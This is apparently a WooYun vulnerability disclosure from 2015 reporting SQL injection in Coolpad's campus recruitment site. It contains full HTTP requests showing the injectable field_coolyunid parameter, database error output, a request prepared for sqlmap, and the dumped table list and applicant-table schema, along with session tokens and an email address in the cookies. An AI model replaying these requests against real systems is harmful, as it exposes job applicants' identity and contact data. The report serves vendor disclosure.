当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126495

漏洞标题:手机行业安全之宇龙通信(酷派)多出处SQL注射(目测暴露用户简历)

相关厂商:yulong.com

漏洞作者: DloveJ

提交时间:2015-07-13 16:49

修复时间:2015-08-28 10:00

公开时间:2015-08-28 10:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-13: 细节已通知厂商并且等待厂商处理中
2015-07-14: 厂商已经确认,细节仅向厂商公开
2015-07-24: 细节向核心白帽子及相关领域专家公开
2015-08-03: 细节向普通白帽子公开
2015-08-13: 细节向实习白帽子公开
2015-08-28: 细节向公众公开

简要描述:

手机行业安全之宇龙通信(酷派)SQL注射(可暴露用户简历)

详细说明:

注入参数均为field_coolyunid=


http://campus.coolpad.com/

登录,修改简历

1.jpg


经过测试以下修改处存在注入!
0x00
个人信息》编辑>保存》抓包

POST /index.php?c=submitResumes&f=savePersonalInfo HTTP/1.1
Host: campus.coolpad.com
Proxy-Connection: keep-alive
Content-Length: 722
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://campus.coolpad.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2438.3 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://campus.coolpad.com/index.php?c=submitResumes&f=resumePreview&act=edit
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: Hm_lvt_cf573ba5889953becfec5b2e08d9160d=1436762927; Hm_lpvt_cf573ba5889953becfec5b2e08d9160d=1436765094; CP_SW_U_Id=cad54902-25ab-4807-b4f6-b9e3ce88e7b5_17wff3; W_CP_T_Id=dt9_1747fb190b-6b19-4213-8a6c-1f85887146e5s1sr; nTalk_CACHE_DATA={uid:kf_9926_ISME9754_guest9C383A1B-A989-99,tid:1436762887533458}; NTKF_T2D_CLIENTID=guest9C383A1B-A989-9977-49BF-7C23C030791A; pgv_pvi=530273280; pgv_si=s2191045632; U_T=null; rememberUserNickName=32564674; isHasLogin=true; shopCart=""; glanceOverGoods=""; Hm_lvt_ed4dc0af212843677141159d85428e45=1436762877,1436768984; Hm_lpvt_ed4dc0af212843677141159d85428e45=1436768988; OZ_1U_1844=vid=v5a342fd662eea.0&ctime=1436768987&ltime=1436768984; OZ_1Y_1844=erefer=http%3A//www.yulong.com/product/product/product/load.html%3FproductBO.product.id%3D6040%26productBO.menuId%3D30&eurl=http%3A//www.coolpad.com/&etime=1436768984&ctime=1436768987&ltime=1436768984&compid=1844; Hm_lvt_384596db34f6f9312806bd8ba87b7dc5=1436762878,1436768985; Hm_lpvt_384596db34f6f9312806bd8ba87b7dc5=1436768988; isMobile=n; datas=%7B%22publish%22%3A%7B%22history%22%3A%5B%22%5C%2Findex.php%3Fc%3DsubmitResumes%26f%3DresumePreview%26act%3Dedit%22%5D%2C%22uid%22%3A32564674%2C%22rtncode%22%3A%220%22%2C%22openid%22%3A%2232564674%22%2C%22expires_in%22%3A%227776000%22%2C%22refresh_token%22%3A%222.e63a865568bd9e287f9f34bef92decc0%22%2C%22access_token%22%3A%222.00534006a7ec55a120825a9584f4cfbb.9185d4279dcfcd5abbe2f50ca80513f4.1436773923100%22%2C%22sex%22%3A%221%22%2C%22email%22%3A%22dongdongxuehei%40163.com%22%2C%22nickname%22%3A%22test%22%2C%22brithday%22%3A%221990-4-5%22%2C%22rtn_code%22%3A%220%22%2C%22headIconUrl%22%3A%22http%3A%5C%2F%5C%2Ffile.coolyun.com%5C%2Fgroup6%5C%2FM06%5C%2FEF%5C%2F1D%5C%2FwKgFFlWjQm-IV6LSAAAAPFVQDX8AAt9pwA9-zoAAABU437.jpg%3Fmethod%3Dgenerate%26type%3Dcrop%26width%3D256%26height%3D256%26quality%3D80%26access_token%3D101CVoAUsqc4DdqemSia8RWgznJq%252FbHKgUmZw%253D%253D%26source%3Dheadimg%26d%3D32564674%26method%3Ddownload%22%2C%22mobile%22%3A%22%22%2C%22uploadToken%22%3A%22923343d9b5cc60459390386fd1f715da%22%7D%7D
field_coolyunid=32564674&field_preview=edit&info%5Bfield_photo%5D=public%2Fuploads%2F2015-07-13%2F14367740192603.jpg&info%5Bfield_realname%5D=%E9%83%BD%E6%98%AF&info%5Bfield_card_type%5D=idcard&info%5Bfield_idcard%5D=110101199609080097&info%5Bfield_sex%5D=gentleman&info%5Bfield_birthday%5D=1996-09-08&info%5Bfield_nation%5D=&info%5Bfield_health%5D=better&info%5Bfield_marital_status%5D=unmarried&info%5Bfield_political_status%5D=members&info%5Bfield_living_city%5D=sad&info%5Bfield_origin_palce%5D=dadad&info%5Bfield_before_colloge_residence%5D=%E5%B7%B4%E9%9F%B3%E9%83%AD%E6%A5%9E%E8%92%99%E5%8F%A4%E8%87%AA%E6%B2%BB%E5%B7%9E&info%5Bfield_graduation_time%5D=2015-01-01&info%5Bfield_height%5D=160&info%5Bfield_weight%5D=0


HTTP/1.1 200 OK
Date: Mon, 13 Jul 2015 08:27:31 GMT
Server: nginx/1.6.0
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.5.10
X-Via: 1.1 nmg29:2 (Cdn Cache Server V2.0)
Connection: keep-alive
Content-Length: 899
<strong>A mysql error has occurred!</strong><br /><strong>Error Number:</strong>1064<br /><strong>Error Description:</strong>[Execute sql sentence error! SQL :(-) UPDATE `clp_seekers` SET  `s_photo`='public/uploads/2015-07-13/14367740192603.jpg' , `s_realname`='都是' , `s_card_type`='idcard' , `s_idcard`='110101199609080097' , `s_sex`='gentleman' , `s_birthday`='1996-09-08' , `s_nation`='' , `s_health`='better' , `s_marital_status`='unmarried' , `s_political_status`='members' , `s_living_city`='sad' , `s_origin_palce`='dadad' , `s_before_colloge_residence`='巴音郭楞蒙古自治州' , `s_graduation_time`='2015-01-01' , `s_height`='160' , `s_weight`='0'  WHERE `coolyun_uid`=32564674' ]:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1<br /><strong>Error Time:</strong>2015-07-13 16:27:30


0x01
联系方式》编辑》保存》抓包

POST /index.php?c=submitResumes&f=saveConnectInfo HTTP/1.1
Host: campus.coolpad.com
Proxy-Connection: keep-alive
Content-Length: 163
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://campus.coolpad.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2438.3 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://campus.coolpad.com/index.php?c=submitResumes&f=resumePreview&act=edit
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: Hm_lvt_cf573ba5889953becfec5b2e08d9160d=1436762927; Hm_lpvt_cf573ba5889953becfec5b2e08d9160d=1436765094; CP_SW_U_Id=cad54902-25ab-4807-b4f6-b9e3ce88e7b5_17wff3; W_CP_T_Id=dt9_1747fb190b-6b19-4213-8a6c-1f85887146e5s1sr; nTalk_CACHE_DATA={uid:kf_9926_ISME9754_guest9C383A1B-A989-99,tid:1436762887533458}; NTKF_T2D_CLIENTID=guest9C383A1B-A989-9977-49BF-7C23C030791A; pgv_pvi=530273280; pgv_si=s2191045632; U_T=null; rememberUserNickName=32564674; isHasLogin=true; shopCart=""; glanceOverGoods=""; Hm_lvt_ed4dc0af212843677141159d85428e45=1436762877,1436768984; Hm_lpvt_ed4dc0af212843677141159d85428e45=1436768988; OZ_1U_1844=vid=v5a342fd662eea.0&ctime=1436768987&ltime=1436768984; OZ_1Y_1844=erefer=http%3A//www.yulong.com/product/product/product/load.html%3FproductBO.product.id%3D6040%26productBO.menuId%3D30&eurl=http%3A//www.coolpad.com/&etime=1436768984&ctime=1436768987&ltime=1436768984&compid=1844; Hm_lvt_384596db34f6f9312806bd8ba87b7dc5=1436762878,1436768985; Hm_lpvt_384596db34f6f9312806bd8ba87b7dc5=1436768988; isMobile=n; datas=%7B%22publish%22%3A%7B%22history%22%3A%5B%22%5C%2Findex.php%3Fc%3DsubmitResumes%26f%3DresumePreview%26act%3Dedit%22%5D%2C%22uid%22%3A32564674%2C%22rtncode%22%3A%220%22%2C%22openid%22%3A%2232564674%22%2C%22expires_in%22%3A%227776000%22%2C%22refresh_token%22%3A%222.e63a865568bd9e287f9f34bef92decc0%22%2C%22access_token%22%3A%222.00534006a7ec55a120825a9584f4cfbb.9185d4279dcfcd5abbe2f50ca80513f4.1436773923100%22%2C%22sex%22%3A%221%22%2C%22email%22%3A%22dongdongxuehei%40163.com%22%2C%22nickname%22%3A%22test%22%2C%22brithday%22%3A%221990-4-5%22%2C%22rtn_code%22%3A%220%22%2C%22headIconUrl%22%3A%22http%3A%5C%2F%5C%2Ffile.coolyun.com%5C%2Fgroup6%5C%2FM06%5C%2FEF%5C%2F1D%5C%2FwKgFFlWjQm-IV6LSAAAAPFVQDX8AAt9pwA9-zoAAABU437.jpg%3Fmethod%3Dgenerate%26type%3Dcrop%26width%3D256%26height%3D256%26quality%3D80%26access_token%3D101CVoAUsqc4DdqemSia8RWgznJq%252FbHKgUmZw%253D%253D%26source%3Dheadimg%26d%3D32564674%26method%3Ddownload%22%2C%22mobile%22%3A%22%22%2C%22uploadToken%22%3A%229d600576e1f16265f3ab7bbb2fd458ad%22%7D%7D
field_coolyunid=32564674&cont%5Bfield_tel%5D=15099999999&cont%5Bfield_email%5D=sddsa%40qq.com&cont%5Bfield_address%5D=&cont%5Bfield_emergency_number%5D=15988880989


HTTP/1.1 200 OK
Date: Mon, 13 Jul 2015 08:29:50 GMT
Server: nginx/1.6.0
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.5.10
X-Via: 1.1 nmg29:2 (Cdn Cache Server V2.0)
Connection: keep-alive
Content-Length: 525
<strong>A mysql error has occurred!</strong><br /><strong>Error Number:</strong>1064<br /><strong>Error Description:</strong>[Execute sql sentence error! SQL :(-) UPDATE `clp_seekers` SET  `s_tel`='15099999999' , `s_email`='sddsa@qq.com' , `s_address`='' , `s_emergency_number`='15988880989'  WHERE `coolyun_uid`=32564674' ]:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1<br /><strong>Error Time:</strong>2015-07-13 16:29:49


0x02
技能/爱好》编辑》保存》抓包

POST /index.php?c=submitResumes&f=saveSkillsHobbiesInfo HTTP/1.1
Host: campus.coolpad.com
Proxy-Connection: keep-alive
Content-Length: 297
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://campus.coolpad.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2438.3 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://campus.coolpad.com/index.php?c=submitResumes&f=resumePreview&act=edit&r=0.38695669337175786
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: Hm_lvt_cf573ba5889953becfec5b2e08d9160d=1436762927; Hm_lpvt_cf573ba5889953becfec5b2e08d9160d=1436765094; CP_SW_U_Id=cad54902-25ab-4807-b4f6-b9e3ce88e7b5_17wff3; W_CP_T_Id=dt9_1747fb190b-6b19-4213-8a6c-1f85887146e5s1sr; nTalk_CACHE_DATA={uid:kf_9926_ISME9754_guest9C383A1B-A989-99,tid:1436762887533458}; NTKF_T2D_CLIENTID=guest9C383A1B-A989-9977-49BF-7C23C030791A; pgv_pvi=530273280; pgv_si=s2191045632; U_T=null; rememberUserNickName=32564674; isHasLogin=true; shopCart=""; glanceOverGoods=""; Hm_lvt_ed4dc0af212843677141159d85428e45=1436762877,1436768984; Hm_lpvt_ed4dc0af212843677141159d85428e45=1436768988; OZ_1U_1844=vid=v5a342fd662eea.0&ctime=1436768987&ltime=1436768984; OZ_1Y_1844=erefer=http%3A//www.yulong.com/product/product/product/load.html%3FproductBO.product.id%3D6040%26productBO.menuId%3D30&eurl=http%3A//www.coolpad.com/&etime=1436768984&ctime=1436768987&ltime=1436768984&compid=1844; Hm_lvt_384596db34f6f9312806bd8ba87b7dc5=1436762878,1436768985; Hm_lpvt_384596db34f6f9312806bd8ba87b7dc5=1436768988; isMobile=n; datas=%7B%22publish%22%3A%7B%22history%22%3A%5B%22%5C%2Findex.php%3Fc%3DsubmitResumes%26f%3DresumePreview%26act%3Dedit%22%5D%2C%22uid%22%3A32564674%2C%22rtncode%22%3A%220%22%2C%22openid%22%3A%2232564674%22%2C%22expires_in%22%3A%227776000%22%2C%22refresh_token%22%3A%222.e63a865568bd9e287f9f34bef92decc0%22%2C%22access_token%22%3A%222.00534006a7ec55a120825a9584f4cfbb.9185d4279dcfcd5abbe2f50ca80513f4.1436773923100%22%2C%22sex%22%3A%221%22%2C%22email%22%3A%22dongdongxuehei%40163.com%22%2C%22nickname%22%3A%22test%22%2C%22brithday%22%3A%221990-4-5%22%2C%22rtn_code%22%3A%220%22%2C%22headIconUrl%22%3A%22http%3A%5C%2F%5C%2Ffile.coolyun.com%5C%2Fgroup6%5C%2FM06%5C%2FEF%5C%2F1D%5C%2FwKgFFlWjQm-IV6LSAAAAPFVQDX8AAt9pwA9-zoAAABU437.jpg%3Fmethod%3Dgenerate%26type%3Dcrop%26width%3D256%26height%3D256%26quality%3D80%26access_token%3D101CVoAUsqc4DdqemSia8RWgznJq%252FbHKgUmZw%253D%253D%26source%3Dheadimg%26d%3D32564674%26method%3Ddownload%22%2C%22mobile%22%3A%22%22%2C%22uploadToken%22%3A%229d600576e1f16265f3ab7bbb2fd458ad%22%7D%7D
field_coolyunid=32564674&hobb%5Bfield_english_level%5D=cet4&hobb%5Bfield_english_scores%5D=1132&hobb%5Bfield_english_certficate%5D=13&hobb%5Bfield_english_certficate_date%5D=2014-01-01&hobb%5Bfield_english_certficate_scores%5D=123&hobb%5Bfield_other_skills%5D=3&hobb%5Bfield_personal_hobbies%5D=31


HTTP/1.1 200 OK
Date: Mon, 13 Jul 2015 08:31:23 GMT
Server: nginx/1.6.0
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.5.10
X-Via: 1.1 nmg29:2 (Cdn Cache Server V2.0)
Connection: keep-alive
Content-Length: 439
<strong>A mysql error has occurred!</strong><br /><strong>Error Number:</strong>1064<br /><strong>Error Description:</strong>[Execute sql sentence error! SQL :(-) SELECT COUNT(*) FROM `clp_seekers_skills_hobbies`  WHERE `s_id`=32564674' ]:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1<br /><strong>Error Time:</strong>2015-07-13 16:31:23


》》》》》刚才看到厂商把洞确认了,没想到评了个低,没心情一个一个写了,直接跑吧,其他自己查!!《《《《《
0x03
其中的一个包

POST /index.php?c=submitResumes&f=saveConnectInfo HTTP/1.1
Host: campus.coolpad.com
Proxy-Connection: keep-alive
Content-Length: 164
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://campus.coolpad.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2438.3 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://campus.coolpad.com/index.php?c=submitResumes&f=resumePreview&act=edit
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: Hm_lvt_cf573ba5889953becfec5b2e08d9160d=1436762927; Hm_lpvt_cf573ba5889953becfec5b2e08d9160d=1436765094; CP_SW_U_Id=cad54902-25ab-4807-b4f6-b9e3ce88e7b5_17wff3; W_CP_T_Id=dt9_1747fb190b-6b19-4213-8a6c-1f85887146e5s1sr; nTalk_CACHE_DATA={uid:kf_9926_ISME9754_guest9C383A1B-A989-99,tid:1436762887533458}; NTKF_T2D_CLIENTID=guest9C383A1B-A989-9977-49BF-7C23C030791A; pgv_pvi=530273280; pgv_si=s2191045632; U_T=null; rememberUserNickName=32564674; isHasLogin=true; shopCart=""; glanceOverGoods=""; Hm_lvt_ed4dc0af212843677141159d85428e45=1436762877,1436768984; Hm_lpvt_ed4dc0af212843677141159d85428e45=1436768988; OZ_1U_1844=vid=v5a342fd662eea.0&ctime=1436768987&ltime=1436768984; OZ_1Y_1844=erefer=http%3A//www.yulong.com/product/product/product/load.html%3FproductBO.product.id%3D6040%26productBO.menuId%3D30&eurl=http%3A//www.coolpad.com/&etime=1436768984&ctime=1436768987&ltime=1436768984&compid=1844; Hm_lvt_384596db34f6f9312806bd8ba87b7dc5=1436762878,1436768985; Hm_lpvt_384596db34f6f9312806bd8ba87b7dc5=1436768988; isMobile=n; datas=%7B%22publish%22%3A%7B%22history%22%3A%5B%22%5C%2Findex.php%3Fc%3DsubmitResumes%26f%3DresumePreview%26act%3Dedit%22%5D%2C%22uid%22%3A32564674%2C%22rtncode%22%3A%220%22%2C%22openid%22%3A%2232564674%22%2C%22expires_in%22%3A%227776000%22%2C%22refresh_token%22%3A%222.e63a865568bd9e287f9f34bef92decc0%22%2C%22access_token%22%3A%222.00534006a7ec55a120825a9584f4cfbb.9185d4279dcfcd5abbe2f50ca80513f4.1436773923100%22%2C%22sex%22%3A%221%22%2C%22email%22%3A%22dongdongxuehei%40163.com%22%2C%22nickname%22%3A%22test%22%2C%22brithday%22%3A%221990-4-5%22%2C%22rtn_code%22%3A%220%22%2C%22headIconUrl%22%3A%22http%3A%5C%2F%5C%2Ffile.coolyun.com%5C%2Fgroup6%5C%2FM06%5C%2FEF%5C%2F1D%5C%2FwKgFFlWjQm-IV6LSAAAAPFVQDX8AAt9pwA9-zoAAABU437.jpg%3Fmethod%3Dgenerate%26type%3Dcrop%26width%3D256%26height%3D256%26quality%3D80%26access_token%3D101CVoAUsqc4DdqemSia8RWgznJq%252FbHKgUmZw%253D%253D%26source%3Dheadimg%26d%3D32564674%26method%3Ddownload%22%2C%22mobile%22%3A%22%22%7D%7D
field_coolyunid=32564674*&cont%5Bfield_tel%5D=15099999999&cont%5Bfield_email%5D=sddsa%40qq.com&cont%5Bfield_address%5D=&cont%5Bfield_emergency_number%5D=15988880989


交给sqlmap

5.jpg


6.jpg


7.jpg


Database: coolpadjobdb
[35 tables]
+---------------------------------+
| clp_college                     |
| clp_college_department          |
| clp_count_position              |
| clp_department                  |
| clp_department_managers         |
| clp_hiring                      |
| clp_hiring_employ               |
| clp_hiring_first                |
| clp_hiring_second               |
| clp_lecture                     |
| clp_managers                    |
| clp_managers_area               |
| clp_position                    |
| clp_position_city               |
| clp_position_interviewarea      |
| clp_position_type               |
| clp_position_workarea           |
| clp_preach_plan                 |
| clp_province                    |
| clp_ranks                       |
| clp_recruit_area                |
| clp_recruitment_dynamics        |
| clp_seekers                     |
| clp_seekers_active              |
| clp_seekers_audition            |
| clp_seekers_behave              |
| clp_seekers_connection          |
| clp_seekers_education           |
| clp_seekers_family_relationship |
| clp_seekers_practice_experience |
| clp_seekers_project_experience  |
| clp_seekers_self_evaluation     |
| clp_seekers_skills_hobbies      |
| statistics_datas                |
| statistics_status               |
+---------------------------------+


Database: coolpadjobdb
Table: clp_seekers
[38 columns]
+----------------------------+--------------------------------------------------
----------------------+
| Column                     | Type
                      |
+----------------------------+--------------------------------------------------
----------------------+
| coolyun_uid                | int(9)
                      |
| s_address                  | varchar(420)
                      |
| s_before_colloge_residence | varchar(45)
                      |
| s_birthday                 | timestamp
                      |
| s_card_type                | enum('idcard','other')
                      |
| s_edit_date                | datetime
                      |
| s_email                    | varchar(24)
                      |
| s_emergency_contact        | varchar(72)
                      |
| s_emergency_contact_tel    | varchar(18)
                      |
| s_emergency_number         | varchar(42)
                      |
| s_eng_rank_goal            | varchar(12)
                      |
| s_eng_rank_type            | enum('CET4','CET6','PETS','IELTS','TOFEL','TEM4',
'TEM8','BEC','CATTI') |
| s_expect_graduation        | timestamp
                      |
| s_graduation_time          | datetime
                      |
| s_health                   | enum('better','nice','bad')
                      |
| s_height                   | int(4)
                      |
| s_iconb                    | varchar(420)
                      |
| s_icons                    | varchar(420)
                      |
| s_id                       | int(8)
                      |
| s_idcard                   | varchar(20)
                      |
| s_living_city              | varchar(45)
                      |
| s_marital_status           | enum('married','unmarried','divorce','secret')
                      |
| s_name                     | varchar(72)
                      |
| s_nation                   | varchar(32)
                      |
| s_origin_palce             | varchar(128)
                      |
| s_other_eng_rank_goal      | varchar(12)
                      |
| s_other_eng_rank_type      | enum('CET4','CET6','PETS','IELTS','TOFEL','TEM4',
'TEM8','BEC','CATTI') |
| s_other_lang_rank          | varchar(300)
                      |
| s_password                 | varchar(32)
                      |
| s_photo                    | varchar(300)
                      |
| s_political_status         | enum('members','party','other')
                      |
| s_portrait                 | varchar(360)
                      |
| s_realname                 | varchar(24)
                      |
| s_save_date                | datetime
                      |
| s_sex                      | enum('lady','gentleman')
                      |
| s_tel                      | varchar(18)
                      |
| s_wechat                   | varchar(24)
                      |
| s_weight                   | int(4)
                      |
+----------------------------+--------------------------------------------------
----------------------+


这表示是什么,我不知道,自及看吧!

漏洞证明:

坐在这里写这么多,就不能给个20,上一个给低,这样真的好么?

修复方案:

给个高20rank可好?

版权声明:转载请注明来源 DloveJ@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-07-14 09:58

厂商回复:

您好,我们秉着公平公正的原则,依据漏洞发现难度、利用难度、造成的危害程度对漏洞做出较中肯的评价,感谢您对酷派安全的关注。

最新状态:

暂无